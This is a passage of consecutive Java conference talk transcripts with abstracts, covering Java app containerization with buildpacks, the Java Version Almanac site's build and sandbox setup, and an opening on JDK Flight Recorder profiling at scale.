dedicated index file that says, hey, this package or this stuff you will put into this layer, and this other one into that layer. In order to do that, however, we need to get back to a Dockerfile. So here is how you do it with Spring. I have a Dockerfile again and it's a multi-stage build — you can see here you have three stages. The first one creates the package, creates the JAR; then you have a second one that actually explodes the JAR; and the third one will actually run the application through a specific Spring Boot mechanism. This is a lot of work, but instead of doing that ourselves, it would be much, much better to let somebody else do it. And that's the idea behind buildpacks. Cloud Native Buildpacks are backed by the Cloud Native Computing Foundation, and a buildpack is a tool that's able to understand how to build your project. If you have been doing cloud stuff for some years, you might know about Heroku. When you were using Heroku, you would just git push your sources to Heroku, and then Heroku, on their own servers, would try to sniff what kind of project it was and build it accordingly. So it would say, oh, I see a pom file, so it's probably a Maven project, so I will build it with Maven. And now this way of doing things was finally deemed worthwhile: Heroku was joined by Pivotal — or VMware Tanzu, I don't remember what their name is right now — the people behind Spring, and they both provide this standard of buildpacks. You've got a lot of configuration options, and you can pretty much do what you want, with some limitations, of course. So the idea is that you've got no Dockerfile.
It's Skaffold friendly, and because I'm using a Spring Boot project, it knows it's a Spring Boot project, so it can use the previous four layers or, if you customized it, all the layers. However, there are some downsides as well. Again, we get back to the fact that there is no sync between the POM and the Docker image version. It's not that there is no choice of the parent image, but it's a very limited choice, and if you want to change the parent image, you need to provide an image that is compatible. I tried to dive into it, and it's not just some labels — it seems to be a pretty complex and dedicated process. I've also noticed it takes a long time, even without changes. Perhaps I mismanaged it, but for me it's very long — especially because the builder images are not kept around, so every time it downloads the JDK again. So you can do it by running — first you need to install the pack CLI, then you run pack, you set the builder, sorry, and it will infer the build image. But why do that? With the latest version of Spring Boot, we can do the same inside Maven or Gradle, and it will use buildpacks under the cover. So how do we do it? It's quite easy. We just run — sorry, not here, here — we just run mvn, always mvn, spring-boot:build-image. Again, the process is very, very long, so I won't show it to you. And in the end, this is what we get: we got rid of the Dockerfile again, here we have the layer configuration enabled, and as you can see nothing has changed otherwise. So the plugin itself knows how to create Docker images. That's pretty good. And the really, really nice thing is that there are configuration options, and it's very easy to change the configuration to use GraalVM and to build a GraalVM native image. For example — that's the last thing I want to show you — to create a native image, it just takes adding an environment variable, BP_BOOT_NATIVE_IMAGE set to true, and that's done. And if we check again the size of the images, they are here: here you have Spring Boot inside a JVM, and here you have Spring Boot as a normal native process. So if you are interested in cloud stuff, if you want fast startup time and low memory consumption, then you can just use this kind of image. And it's a wrap. I just want to finish by mentioning docker-squash. You can try to flatten the layers. In this simple application, I tried to flatten the layers of the 1.0 image and it was less than one percent gain in size, and for the 0.5 it was again less than one percent gain in size. So depending on what you value — faster build times or smaller image sizes — you might want to check docker-squash; it might depend on your use case and probably on your parent images. But with this sample, my layers were nicely done, so docker-squash doesn't bring any benefit. So as a recap, when you want to Dockerize your Java application, you must think about several things: keeping the version in sync between the POM and the image, and organizing the layers so that your builds are faster. And probably forget about squash — it might have seemed super popular at some point, but it's not anymore. So thanks for listening to me. You can read my blog, you can follow me on Twitter, and more importantly, if you want to try everything that I did here, everything is on GitHub. So thanks a lot and have a good day.
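The REST endpoint used throughout these demos was only described verbally; a hedged sketch of what such a controller could look like follows — class, path and map names are my own assumptions, package names are per Hazelcast 4.x, and starting an embedded member here is a simplification of the setup in the demo, where a Hazelcast instance runs in the background:

import com.hazelcast.core.Hazelcast;
import com.hazelcast.core.HazelcastInstance;
import com.hazelcast.map.IMap;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class DataController {

    // simplified: start an embedded Hazelcast member instead of connecting to an external one
    private final HazelcastInstance hazelcast = Hazelcast.newHazelcastInstance();
    private final IMap<String, String> data = hazelcast.getMap("data");

    @PutMapping("/{key}")
    public void put(@PathVariable String key, @RequestBody String value) {
        data.put(key, value); // stores the value in the distributed map
    }

    @GetMapping("/{key}")
    public String get(@PathVariable String key) {
        return data.get(key);
    }
}
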
While a plain Dockerfile gets the job done, there are actually many more ways to containerize your Java app. They come with a couple of pros, and some cons. As “the Cloud” becomes more and more widespread, now is a good time to assess how you can containerize your Java application. I assume you’re able to write a Dockerfile around the generated JAR. However, each time the application’s code changes, the whole image needs to be rebuilt. If you’re deploying to a local Kubernetes cluster environment, this considerably lengthens the feedback loop. In this demo-based talk, I’ll present different ways to get your Java app in a container: Dockerfile, Jib, and Cloud Native Buildpacks. We will also have a look at what kind of Docker image they generate, how they layer the images, whether those images are compatible with skaffold, etc.
10.5446/52801 (DOI)
Hello everyone, and welcome to the next session, the session about the Java Version Almanac. The Java Version Almanac is basically a collection of data about the history and the future of Java, currently mostly presented as a website. During the presentation I will have a look at how I created this data collection, why I created it, and some things I learned during this little side project. First some words about me. My name is Marc Hoffmann. I'm actually a Java hacker since the very early days, since the very first public release, which was Java 1.0.2. Java at the time looked like this. This was the Javadoc at the time — there was no Javadoc actually; this is basically a web rendering of some documentation which was done with some word processing. In total we had just eight Java packages. This was the whole JDK. For example, if you look at the java.util package at the time, this was the whole package. There were no data containers like Map or List or Set; there were only two implementations, Vector and Hashtable. If you look into that, this is how it rendered at the time. This is how the web looked in the 90s: it was fancy to have images for headlines, like the constructors or methods headlines here. Really nice. Also, the beginning of Java was, as we know, on the client side. The entry point was the Java applet. My first commercial application I worked on started with a Java applet embedded in the browser. From the applet you could start frames and open separate windows. The runtime environment at the time was the JVM embedded in the browser. This is how everything started. Over the years I became involved in open source development. Probably my best known project is the Java code coverage library JaCoCo and its integration into Eclipse called EclEmma. Out of that work, mostly in the area of quality assurance and testing, I started to contribute to OpenJDK. Over the years I also visited many conferences and had opportunities to speak at conferences. Finally, I became an organizer of an unconference — or helped to unorganize the conference — JCrete, on the wonderful island of Crete, together with Heinz Kabutz and others. A couple of years ago I was also nominated as a Java Champion. Let's have a look back at how the early days of Java looked and how Java was released. After 1996, when Java 1 was released, we got Java releases every two or three years. These Java releases were released at one point in time, we could use them for many years in production, and there were updates — it took a couple of years until there was the last public update of a given JDK version. So over the years the API evolved, we got new language features, and the tooling, the compiler, everything improved over time. But what we can see here is that things evolved more or less slowly. For example, between Java 6 and Java 8 there were eight years between those releases. So at the time, as a Java developer, it wasn't very stressful: you could learn a JDK version and the new APIs and work with that for years. And this was also what Java was criticized for. I want to show you a tweet which summarizes it nicely. In 2016, people were complaining: Java is doomed, it evolves so slowly, every good idea takes ages to be available. And just two years later, the perception was very different: Java is doomed, it evolves so quickly, nobody will be able to keep pace. Daniel Fernandez tweeted that. I really liked that.
And if we look at the timeline after 2016, we'll see maybe the reason why this is. Since Java 9, we get new major Java releases every six months — two releases a year — and every release contains new features, new APIs. So Java now evolves really quickly. But if you have a closer look, only every three years there's a long-term support release. As you can see on this diagram, the feature releases between the long-term support releases are end-of-life immediately when the next release is done. So you probably will not use them for production, because they are only maintained for six months, and there are maybe one or two updates at most for these feature releases. So now, every six months, you see new features, and if you really want to keep pace and adopt the new features, you really have to follow the OpenJDK project and see what's going on there. I told you before that I'm also working on this bytecode library, the JaCoCo code coverage library, which is based on bytecode. And with all these releases we get new language features and maybe new JVM and bytecode features relevant for the bytecode processing. This leads me to the point that I really need to understand what the new features of the virtual machine are in order to make JaCoCo available even for the latest Java versions — and you need to test that, as you will see later. So my motivation to start the Java Almanac was basically: we have a high frequency of releases, and I was curious what the new language features for each release are, what the new APIs are, and which new bytecode options are there. And this is, for example, the test matrix for the JaCoCo project: currently we test on 13 JDK versions, from 5 to 17, and make sure the tool runs smoothly on all of these runtimes. So how did it all begin with the Java Version Almanac? I took a lot of notes from presentations I attended or presentations I gave myself, and over the years I got quite a collection of information about Java. One day I started collecting and writing down this information in a public GitHub repo. It looked like this at the time: basically just Markdown files, and you could browse them here in the GitHub interface. I wrote down information about each release — what the Java enhancement proposals for the JVM and for the language are, and what happened in the library and the APIs. Why Markdown? Markdown is a text format and it can be put in version control, so that's a natural way to work with it. I also started using Markdown for presentations, for example — the presentation you're currently looking at is completely written in Markdown; there's a small framework called Remark.js which renders the Markdown nicely as slides. And some people even write entire books in Markdown, for example the one by Rémi Forax, called a guide to modern Java. I think it's a work in progress, but it has some really interesting chapters, and everything is written in Markdown with lots of examples embedded — you might have a look. And finally I decided to convert all of that into a website to make it more accessible than the GitHub user interface, and this was when the javaalmanac.io website started. In case you haven't seen it before, the idea here is to have mostly reference information immediately accessible. For example, this version matrix provides direct links to the API documentation, to the language specification, to the release notes. And there's also a comparison between the APIs.
So for example we can see what the new APIs in Java 17 are in comparison to Java 6. I will show you later how this is done, how this is created. I wanted to have a one-click reference, because I basically created the project for myself, for my daily work: I wanted to see what the new APIs are and keep an eye on API changes. It also helps with learning new features, especially language features. For me it helps a lot to actually write about them and write down how things work; this helps me in learning new things. So I wrote a couple of articles about new language features, and I call that the in-depth content; we will have a look at that later. There are many distributions of OpenJDK nowadays and the site should be vendor-neutral. I also included commercial distributions, commercial products, on the site for reference, because if you make your living with Java coding you might end up actually using commercially supported products. And this is a lot of content, and this is all spare-time work, so for me it is important to automate as much as possible — especially the data collection, the updating of the data and the publishing should be automated where possible. I'll show you how this is done. This is a quick architecture view of the backend of the site. It basically uses GitHub infrastructure and a little bit of AWS components. On GitHub there's the repository where all the content of the site is stored and maintained. The content consists of text files — again Markdown — and wherever possible I try to convert the text into structured data, JSON data, to make it accessible for other use cases as well. This data and the text are converted into a static website, and for the static website rendering I picked the Hugo static site generator. It's written in Go, it's very powerful, very fast, and I really like this project; it's actively maintained, you see a couple of releases every year. So in case you need to create a static website out of Markdown documents, really have a look at the Hugo project. The website is then stored on AWS, in S3 buckets, along with static content which is not created by Hugo — for example historic Javadoc or historic documents — which I make accessible on the site. Everything is then made accessible through the web with a public endpoint and SSL termination, HTTPS; here AWS CloudFront is a handy and cheap tool to have a frontend for your web projects. And there's also the frontend for the Java sandboxes — we'll talk about that in a minute; this is another nice feature I added to play with new Java versions. As I told you, I try to be data-driven where possible, and I'll show you some examples here. For example, the information about every release is a structured JSON document which includes things like release dates and documentation links. With the Hugo rendering process this finally gets converted into a nice HTML website with all the information included here. The same goes for the API diffs. The API diffs are created by a process — we will have a look at this process soon — and the files are created from the diff. Here, for example, is the difference between Java 9 and Java 8, and here we see — not very human-readable — a structure of all the changes between two versions, and in the HTML it renders like this. Now it's really accessible, and this is the new, deprecated or changed APIs in Java 9.
And here's something sad: in Java 9, the Java applet actually became deprecated. So that's how everything started — and the applet is not the typical framework we use for application development nowadays. Nowadays Java is, at least in my context, mostly used on the backend, and the applet that started everything in 1996 became deprecated with Java 9. You can also see all the other changes between Java versions, and it's basically a matrix: the site allows you to compare any Java releases and the APIs between any Java releases. Also, there are quite a few options nowadays to actually use OpenJDK. There are many vendors, and they provide different packages for different platforms, and I wanted to have an overview of all the possible options to install Java for a specific platform if you want a specific Java version. I also collected that data in structured documents, for example for AdoptOpenJDK. Here you see what platforms are supported for, for example, version 8, and these are all the platforms — for example, if you want to run Java on your Raspberry Pi, you will find the corresponding package at AdoptOpenJDK. And this then also renders on the site, and for each Java version, down here, there's a table with all the different vendors. You see there are quite a few vendors nowadays that produce OpenJDK builds, and there are also quite a few platforms you can use OpenJDK on. And finally, because at least I do some work with Java bytecode, I added a little reference for Java bytecode. There are different sortings, you can see all the opcodes, and most important for me is that I can directly jump to the specification and see the definition of these bytecodes and how they work exactly. So the hard part actually is collecting the data and keeping the data up to date, and as I told you, I try to automate as many things as possible, but there is still a lot of manual collection and manual updating. The API diffs, though, are actually generated: there's a process in place that compares two APIs and creates these JSON files describing the difference. And here what is really, really helpful is dockerized JDKs. For all the JDK versions — or for most JDK versions — you will find Docker images, for example for AdoptOpenJDK and also for the OpenJDK project itself, where you see early access releases like Java 17. I mean, Java 17 is not yet released, but you will find very current and up-to-date early access releases, and this is really nice for testing new JDK features. So if you want to follow the latest Java releases and the current development, I really recommend having a look at the early access builds, and if you don't want to install them locally, just use the Docker images. So there are quite a few JDK versions we keep track of and whose APIs we compare, and for this it turned out to be very useful to use matrix builds. This is a feature of GitHub Actions, and what you basically do here is run the same build with many different parameters. In this particular case, we run the build to extract the API with different Docker images: this is the Docker image name we use — the base image — and this is then the JDK where we analyze the API and find the differences. This works on bytecode again: we go through the Java library, process it with the ASM library, and extract information about the signatures of the class files.
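As a rough illustration of that extraction step — not the Almanac's actual code — walking a class file with ASM and keeping only the externally visible method signatures can look like the sketch below; which classes you feed in and how you store the output are left out.

import org.objectweb.asm.ClassReader;
import org.objectweb.asm.ClassVisitor;
import org.objectweb.asm.MethodVisitor;
import org.objectweb.asm.Opcodes;

import java.io.IOException;
import java.io.InputStream;

public class ApiSignatureDump {
    public static void main(String[] args) throws IOException {
        // Class files remain readable as resources even on modular JDKs.
        try (InputStream in = String.class.getResourceAsStream("String.class")) {
            new ClassReader(in).accept(new ClassVisitor(Opcodes.ASM9) {
                @Override
                public MethodVisitor visitMethod(int access, String name, String descriptor,
                                                 String signature, String[] exceptions) {
                    // Only public/protected members matter for an API diff.
                    if ((access & (Opcodes.ACC_PUBLIC | Opcodes.ACC_PROTECTED)) != 0) {
                        System.out.println(name + descriptor);
                    }
                    return null; // method bodies are irrelevant here
                }
            }, ClassReader.SKIP_CODE);
        }
    }
}

Running something like this over every class of two JDK images — one image per entry in the build matrix — and comparing the resulting sets is essentially what a signature-level diff boils down to.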
For the vendors — the list of vendors — you can study their websites, and some of them provide REST APIs where you can get information about their download artifacts. Instead of manually reading the websites, if there is no REST API, you can do some HTML scraping: if there are tables of information, just try to get the information out of there. And here's something I want to share with you, because when I tried to implement some HTML scraping I came across a little library called jsoup, and in case you need to collect information systematically from the web, I really recommend having a look at that library — it's really great. In this case, as an example, I want to grab some information from the javaalmanac.io page itself. Let's see: here's the table, and the table has links to the Javadoc — they are labelled "API", that's the text of those links — and now the challenge is to retrieve all these links. That's actually pretty simple with the jsoup library: you connect to the endpoint, for example with a GET call — you can also do a POST if you need to provide parameters — and then the nice thing is that you select HTML elements with a CSS selector, so you don't have to write code that iterates through the document or searches for string tokens. For example, in this case I want the element which is in the table, in a row, then in a cell, and which is a link containing the text "API" — this is the element we get, and we print out the URL this link points to. So that's a really nice and powerful tool to collect data from the web. The sandboxes: for every Java release the site contains a sandbox with the latest version of that release, for example the latest early access version, and this allows me to test and try new features without a local installation — I can just go to the website. For example, with Java 17 we have a new API to format binary data as hex strings. You might have done this before in your career as a Java developer, converting a text representation of binary data in both directions — probably every one of us did this before — and now finally we have a nice and handy API in the java.util package which does that for us, and we can directly run it in the sandbox here. The code is then compiled and executed on some backend service, the Docker containers that execute this text. So how is this done? On the frontend, the snippets are directly embedded in the Markdown files. This is a nice feature of the Hugo renderer: you can have little macros here, and this allows me to embed source code directly into the website and then wrap it up with the sandbox and make it executable. For the editor — here you see a nice editor — I figured out that the Ace JavaScript editor is a really nice embeddable library where you have syntax highlighting and the typical features you expect from a programming editor. And for the interaction and the control I decided to use the Vue framework, basically because I'm not a web developer and didn't want to set up Node and everything; Vue you can just embed and use as a library without a complex build setup. In the backend, the Java code is actually not executed in the browser — there's a service in the backend that compiles and executes your snippets. This runs in Docker images and it uses the compiler API of the JDK: the JDK has some tooling APIs where you can basically use most of the JDK tools also via an API.
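Going back to the scraping step for a moment: the jsoup snippet walked through above boils down to roughly the following — the URL and the CSS selector are only illustrative, not the Almanac's actual code.

import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;

public class ScrapeApiLinks {
    public static void main(String[] args) throws Exception {
        // A plain GET; jsoup can also send POST requests with parameters if needed.
        Document doc = Jsoup.connect("https://javaalmanac.io/").get();
        // CSS selector: a link whose text contains "API", inside a table cell.
        for (Element link : doc.select("table tr td a:contains(API)")) {
            System.out.println(link.text() + " -> " + link.absUrl("href"));
        }
    }
}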
And these tooling APIs also cover the compiler. Here's an example: you can get the JavaCompiler interface and then directly feed in source files and compile them. In this case we do it in memory, so the source files that are compiled are not written to disk at all — everything is done in memory — and this is possible with the tooling API of the OpenJDK compiler. And again, we want to have sandboxes for all the Java versions, so the matrix build is our friend again — we've seen that before: we provide some data to the build definition and have different parameters of the build for all the Java versions up to Java 17. And for the Dockerfiles we use, there's also a nice feature: we don't have to duplicate them and write a new, separate Dockerfile for every Java version. Dockerfiles can have arguments, and — I need to scroll up a bit so you can see that — the base image can be an argument, so you can reuse the same Dockerfile for all the different Java versions. This is really nice. And of course we try to update this regularly: every night a GitHub Action runs — another nice thing about GitHub Actions is that you can schedule them periodically — and then the JDKs of the sandboxes are updated. In this case, for example, the Java 17 sandbox at this point in time is the early access version, build number five. As I told you before, the site also has some articles about JDK features, for example all aspects of method references, and here the sandbox is also very useful, because example snippets can be directly embedded on the website and also executed on the website, and readers can try and fiddle around with the syntax and see how things work — especially on the new Java versions — without having to install the corresponding JDKs. Most of the articles in the meantime are provided by Cay Horstmann. This is a nice cooperation: Cay is a creator of great Java content and Java books, so you might check out his website, horstmann.com — you will find lots of nice articles about Java and also references to his books. Maybe have a look at that. Because I'm a big fan of sharing knowledge and learning together, of course everything is open source. I decided to use a Creative Commons license, so you are basically free to share and adapt the data and do whatever you want with it, as long as you share it again. And all content is in the public repository — there's no secret content; whatever you've seen here, all the data behind it is publicly available in the Git repository, which is also linked on the site. Due to the fact that everything is open source and public, we have a nice cooperation with Foojay — you've seen the previous session — and data, for example about the Java versions, is also rendered on the foojay.io page: they basically take the structured data, the JSON files, and render them in their context. We also share data about the OpenJDK vendors and products, and in the next session you will learn how this is done at foojay.io.
Gerrit Grunwald will show you how they provide an API for the vendors and the OpenJDK products. So, some outlook — what are my plans and what do I want to achieve in the future? First of all, for the API diffs there are currently only technical API diffs, really just the method signatures; it's not about semantics or documentation. The OpenJDK project provides some diffs where not only the API but the Javadoc is actually compared, and you can see diffs of what actually changed in the Javadoc. This might also be an interesting piece of information, and it would be nice to have diffs on the Javadoc too. Also, I would like to embed examples for the APIs: if you see new APIs, it would be nice to have a collection of examples of how to use them and the idioms of how the new APIs are supposed to be used. The JSON data you've seen before currently just sits in the Git repository, and it would be nice to also have it available through an API, like a REST API. That is also in discussion with the foojay.io project, and we're currently looking for a technical solution for how to make this data available — thinking of something like a static REST endpoint generator. And finally, in my wildest dreams, I would like to create a sandbox for Oak. Oak was the predecessor of Java, an internal project at Sun at the time, and this is how everything started. I think it would be really, really cool to have a sandbox with the original Oak runtime, but I have no contacts and I don't know whether the source code or binaries of the Oak runtime and the Oak compiler still exist. It would be really nice to maybe find some resources about this and actually build an Oak sandbox where you can study and see how everything started 25 years ago. So thanks a lot for attending this little presentation. If you have any questions, I'm around for the next minutes here and I'm happy to answer your questions. Thank you.
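Coming back to the compiler API the sandbox backend relies on: a minimal, self-contained sketch of compiling a source string with javax.tools could look like the code below. The real sandbox presumably also plugs in a custom file manager so the generated class files stay in memory and can be loaded and run; that part is omitted here.

import javax.tools.DiagnosticCollector;
import javax.tools.JavaCompiler;
import javax.tools.JavaFileObject;
import javax.tools.SimpleJavaFileObject;
import javax.tools.ToolProvider;
import java.net.URI;
import java.util.List;

public class InMemoryCompile {

    /** A compilation unit whose source lives in a String instead of a file. */
    static class StringSource extends SimpleJavaFileObject {
        private final String code;
        StringSource(String className, String code) {
            super(URI.create("string:///" + className.replace('.', '/') + ".java"),
                  JavaFileObject.Kind.SOURCE);
            this.code = code;
        }
        @Override
        public CharSequence getCharContent(boolean ignoreEncodingErrors) {
            return code;
        }
    }

    public static void main(String[] args) {
        // Returns null on a JRE-only runtime; a full JDK is required.
        JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
        DiagnosticCollector<JavaFileObject> diagnostics = new DiagnosticCollector<>();
        StringSource source = new StringSource("Hello",
                "public class Hello { public static void main(String[] a) { System.out.println(\"hi\"); } }");
        // With a null file manager the resulting Hello.class lands in the working directory;
        // a sandbox would keep the class bytes in memory via a custom file manager instead.
        boolean ok = compiler.getTask(null, null, diagnostics, null, null, List.of(source)).call();
        diagnostics.getDiagnostics().forEach(System.out::println);
        System.out.println("compiled: " + ok);
    }
}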
Even though it is 25 years old, Java is still a modern and one of the most used programming languages. For this, the language, the APIs, and the runtime have been dramatically improved over the years. As a Java developer since the early 1.0 days, the presenter has collected extensive information over the years and has finally put it together on the Java Version Almanac website. In this session, we take a look behind the scenes of the Java Version Almanac and touch on some trivia about the history and future of Java.
10.5446/52802 (DOI)
Hey everyone, my name is Marcus, I'm with Datadog, and this presentation is going to be about things that I've learned over the past years using Flight Recorder, and especially the things that I've learned over the past two years working with Flight Recorder at an immense scale at Datadog. So the agenda is pretty simple: I'll start with a quick introduction to the Flight Recorder, then I'm going to move over to lessons that I've learned, and hopefully end with some demos — we'll see if there's time. So the Flight Recorder can be thought of as the data flight recorder of a modern aircraft, the thing in the black box that is recording what is going on in the cockpit and different sensors like altimeters and stuff like that. But in this case, of course, it's recording what is going on in the Java runtime and what is going on in the application running in the Java runtime. For the runtime it might be recording things like compilations and garbage collections, and for the application it might be recording where the application is spending the most time on CPU or where you have thread halts. And it does this at a very low overhead, of course, because you wouldn't want your application to change behavior just because you have the Flight Recorder running, just like you probably wouldn't want your plane to do that. So it does all of these things at a very low overhead. And there are a whole lot of APIs for controlling the Flight Recorder or contributing your own data into the Flight Recorder. There is also a whole lot of different tooling available: you have the JMC UI, and there is also tooling included with the JDK. And the Flight Recorder can be used to solve quite a range of different problems — I'm going to be mentioning a few of them later. So this all started a long time ago with a little Swedish runtime called JRockit. I'm not going to spend too much time on this slide, but it was initially used to figure out what was going on in the runtime — what kinds of applications there were and how the applications were utilizing the runtime. So we used it as a tool to optimize the runtime itself, not to find problems in customer applications. Of course, since there was a bit of interest in this from customers, and we needed money — we were a small Swedish company — we productized it and called it JRockit Mission Control. After a few acquisitions Oracle owned JRockit, and after that Sun was acquired by Oracle, the JVM teams merged, and it was rebranded into Java Flight Recorder and Java Mission Control. And when this all was open sourced, it was rebranded again, because there were some concerns regarding registered trademarks and registered names or something like that, and it became the JDK Flight Recorder. It was eventually backported to OpenJDK 8. So if you have OpenJDK 8 or above, you can be using the JDK Flight Recorder, and if you have Oracle JDK 7 or above, you can use the Java Flight Recorder. Anyway, inside there is a recording engine which records events into thread-local buffers, and when those are full, they are copied into global buffers. When those global buffers are full, you can either configure it to emit these buffers onto disk into a file repository, or you can just keep overwriting, reusing those buffers. So I mentioned that the overhead is very low with Flight Recorder, and there are a bunch of different tricks being used to keep it down. One is to use the invariant TSC for timestamping — the timestamp counter in the CPU.
It's also using thread-local native buffers, as mentioned in the previous slide, to record events into. It's using a very efficient format: it's not doing a lot of work when serializing these events into the buffers, it's using LEB128 encoding to keep integer sizes down, and some other tricks — it's a very fast, quick, hands-off kind of serialization format. And it doesn't do much when it's emitting these buffers to disk either, by the way. It's also collecting data very cheaply: much of the data that is captured is already sort of on the path where that data occurs. It's not like we need to go through the entire heap again to find some piece of information; we can piggyback on things that are already happening in the runtime, which makes much of the data very cheap to produce. And also, since it's built into the JDK, sometimes some abstractions can be skipped and internal data structures used for the event and event layout, so sometimes it can be cheaper just because of that. It's also trying very hard not to change the runtime characteristics. So, for example, if you built a very naive allocation profiler, you would likely undo any chances of scalarization optimizations, whereas here that won't happen — your GC behavior won't just change radically because you moved over and turned on the Flight Recorder. Some other interesting properties of JFR: it is self-describing. The chunks, the individual chunks of information that are produced by the Flight Recorder, all contain the metadata required to be able to parse them. So the layout of events, type information, metadata — it's all in the individual chunks, and they are repeated, so you don't need to go to the beginning of time to find the definition of an event from when it was first defined; that information will be readily available in every chunk. And these chunks are also self-contained, so all the information you need to be able to resolve a chunk is in the chunk as well — for example, the constant pools. And there are some different ways you can do chunk rotations: one of them is starting or stopping a recording, you can get a new chunk by creating a snapshot, you can do it by changing where the file repository is located — there are a few different ways. This will be required information for later in the talk. And a flight recording itself is just a number of chunks, one or more, so every chunk is in itself a flight recording. Cool. So I thought I'd do a quick demo of the Flight Recorder. Okay, so in this demo we have a recording that I've already opened in Mission Control, and as you guys can see, there are a lot of monitor-enter events here — Java Monitor Blocked — we're waiting to enter a monitor in all of these different places. And one thing to note here is that it's not just stack traces. Obviously we can see the stack traces here — they're not terribly exciting because it's a demo — but we can see how we ended up waiting to enter this monitor. Even more interesting is that we actually have information about the exact time we waited on this monitor; we can see the monitor class, the previous monitor owner, the monitor address — all things that might help us resolve this problem. So in this case we can see we're obviously having a lot of synchronization on this logger, and it's just one instance that we're blocking on from all of these different threads, and we can see the stack trace to it.
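If you would rather sift through such a recording programmatically than in the Mission Control UI, the jdk.jfr.consumer API in the JDK reads the same chunk format. A small sketch follows — the file path is a placeholder, and the monitor event's field name is written from memory, so verify it against the event metadata:

import jdk.jfr.consumer.RecordedEvent;
import jdk.jfr.consumer.RecordingFile;

import java.nio.file.Path;

/** Prints the longest monitor-blocked events from a recording file. */
public class MonitorBlockedReport {
    public static void main(String[] args) throws Exception {
        for (RecordedEvent event : RecordingFile.readAllEvents(Path.of("recording.jfr"))) {
            if (event.getEventType().getName().equals("jdk.JavaMonitorEnter")
                    && event.getDuration().toMillis() >= 10) {
                // "monitorClass" is the field name as I remember it; check the metadata view in JMC.
                System.out.println(event.getDuration().toMillis() + " ms blocked on "
                        + event.getValue("monitorClass") + " in thread "
                        + event.getThread().getJavaName());
            }
        }
    }
}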
I'll also take the opportunity — I have another recording here, and the only reason for that is that I wanted to show you that, hey, we also have pretty graphs in Mission Control. And flame graphs too: whatever we click, we can now get flame graphs for it. And we also get graph views — a nice zoomable graph view. Yeah. Okay, so that's enough demo. Okay, so lessons learned. One thing to note is that all of these observations are from running JFR at a scale that is ridiculous, with all kinds of loads, all kinds of applications — from ones with thousands and thousands of threads, to effectively single-threaded ones, to high allocation rate ones — basically pretty much everything is represented here. So for you, with your kind of services, these might be edge cases that you would never run into. That's worth noting. Also, at Datadog we really wanted to be able to support the use case of continuously capturing all of this data. There are a couple of different reasons for this. One is, of course, that it's really nice to always have actionable data when something goes bad, and to have it readily available. It's also great to be able to break down data: if you have all the data available, you can provide context for it and break it down into whatever buckets you want, which is of course very nice, especially for distributed tracing. And you also capture a continuous stream of data for analysis and statistics, so you don't need to remember to engage data capturing just because you released a new version of the service, or because it happened to be Black Friday and you wish you had had the sense to enable the profiler. So there are multiple good reasons for wanting to capture all the profiling information, and the question then is: is that even economically feasible? What would the data rate be? What would the actual performance overhead be? The cool thing is, it actually works surprisingly well, at a pretty incredible scale. We're ingesting terabytes of JFR data every minute at Datadog, and we're ingesting the data from every Java process that is running the profiler. The recorded data size is about five megs per minute, two megs compressed, which corresponds to approximately 100,000 events. Normally we collect one chunk per minute. The CPU overhead is usually less than two percent, and the cost for continuously repeating the metadata is about half a percent. So the price we're paying for being able to parse whatever data is recorded in the Flight Recorder at any given time is pretty low. It also means we don't need any state — we'll always have what we need to parse any kind of recording. It's pretty nice. Regarding the compression of recordings, a colleague of mine, Jaroslav Bachorik, figured out for us which compression algorithm would be best, and we weren't just interested in being able to compress them a lot — quite the contrary, we really wanted to go for something which spent the least amount of CPU cycles over at the client while still providing a decent compression ratio. And for us, that turned out to be LZ4 with the default settings. So the recording size here: small is a 1.5 megabyte recording, large is a 5 megabyte recording. The throughput is not normalized, it's in recordings per second. And the compression ratio is, of course, how much smaller the recording became. And for us, it really is LZ4.
It does the least damage over at the client, and it's fairly efficient. Okay, so exception profiling. Starting with exception profiling: the built-in JFR exception profiler can be configured to capture all exceptions or just errors. And we thought: errors, how many can there be? So why don't we just enable the exception profiler for errors? Well, according to the Java language specification, Error is the superclass of all the exceptions from which ordinary programs are not expected to recover. So you would be excused for thinking that there shouldn't be that many errors thrown in an application. Well, that's not quite true. One of the most popular and widely used Java libraries — used quite a lot internally at Datadog as well — threw an enormous amount of errors: there was a subclass named LookaheadSuccess that was used for control flow in a parser. So, you know, outside the ivory tower not every program might be in compliance with the Java language specification. But the exception profiling was actually great: it was great to be able to capture both caught and uncaught exceptions, see how much was actually being thrown, and optimize so that fewer of them were thrown, because many of them were thrown where they didn't need to be. So we went ahead and invented our own new exception profiler. The new exception profiler has two different kinds of events. One is exceptions per type: we emit them at chunk rotation, so on a new chunk we get an event for each of the exception types with a count for each. And we sample the first thrown exception of each type, and then we try to sub-sample to hit a certain target rate. We're using inspiration from PID controllers to try to get these events evenly spread across time. We'll talk about this a little bit later when we get to the allocation profiler, because we later built a new allocation profiler for JFR and we were inspired by the work that was done for the exception profiler. Okay, so a little bit later is now. Allocation profiling was introduced in JFR quite some time ago, in 7u40, when it was still the Java Flight Recorder. To not have too severe performance implications and to not emit too many events, it uses two paths through the allocation code that aren't hit all the time: one of them is when a new thread-local allocation buffer (TLAB) is retired, and the other one is when we need to directly allocate something outside of the TLAB, for example when we directly allocate some big object on the heap. Normally this has really good runtime performance and data production rate. But these days you have these 96-plus-core beasts that are allocating like crazy on every core, and you might run into edge cases where you simply get too much data. Actually, first of all we had a performance problem: there was a hash code bug regarding the JFR constant pools that we ran into, which caused us to use way more CPU than necessary when working with stacks. Once that was fixed, the CPU overhead of using this wasn't too bad, but we still produced way more data than we could handle. So we needed a means of better controlling the data production rate, and the solution was to use the PID controller inspiration here as well. So we added a new allocation profiler to JFR in JDK 16 and above. First, we got inspired by the JVMTI take on this: in JDK 11, JVMTI got an allocation sampler that uses the same code paths as the JFR TLAB events.
